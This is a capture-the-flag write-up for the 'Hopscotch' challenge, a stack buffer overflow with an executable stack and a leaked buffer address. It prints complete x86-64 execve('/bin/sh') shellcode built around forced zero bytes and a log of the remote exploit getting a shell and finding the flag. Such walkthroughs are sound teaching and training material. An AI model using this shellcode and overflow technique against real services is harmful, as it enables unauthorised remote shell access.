Appearance
One childhood pasttime I never got to experience much is Hopscotch, a game where you jump and hop over boxes to reach to the goal.
Won't you play with me?
Files given:
This challenge is a simple shellcoding exercise.
Challenge details
There is no canery and NX bit is not set, furthermore the address to our input is printed, hence it we need to give it a proper shellcode to run.
We have a 48 byte array that we can write 96 bytes to, allowing us to overflow the return pointer. However, there is a variable right after the array acting as a 'canery' and is checked against 1337, so we will have to take care of that when overflowing.
The difficulty lies in the fact that when we input our payload, the 9,21,33,45th bytes are set to 0, hence we need a shellcode that has those as well.
There are 2 immediate ideas that comes to mind, a very short jump or moving 0 to a register. We can try out these in shell-storm and prepare our shellcode there. For instance the following are viable options to use when needing a 0:
b"\xb0\x00", # mov al,0b"\xb4\x00", # mov ah,0b"\xb8\x00\x00\x00\x00", # mov eax,0b"\xeb\x00", # jmp 2note that thejmp 2acts as anopas it is2bytes long. Using these in mind, I simply inserted these whenever appropriate to get
0x00: 31 C0 xor eax, eax
0x02: 48 C7 C0 00 00 00 00 mov rax, 0
0x09: 48 BB D1 9D 96 91 D0 8C 97 FF movabs rbx, 0xff978cd091969dd1
0x13: B0 00 mov al, 0
0x15: 48 F7 DB neg rbx
0x18: 53 push rbx
0x19: 54 push rsp
0x1a: 5F pop rdi
0x1b: 99 cdq
0x1c: 52 push rdx
0x1d: 57 push rdi
0x1e: 54 push rsp
0x1f: B0 00 mov al, 0
0x21: 5E pop rsi
0x22: B0 3B mov al, 0x3b
0x24: 0F 05 syscallUsing this we get shell and a with one very lazy grep command, we obtained the flag!
ariana@ariana ~/D/S/2/W/Hopscotch> py exploit.py remote
[+] Opening connection to chals.whitehacks.ctf.sg on port 20401: Done
[*] Switching to interactive mode
Enter input: $ grep -rnw "WH2021" / 2>/dev/null
/home/hopscotch/flag.txt:1:WH2021{8a11f6615742a_h0p_st3p_jUMp_Dr3w_Dr@w_dr@wN}The solution script can be found at exploit.py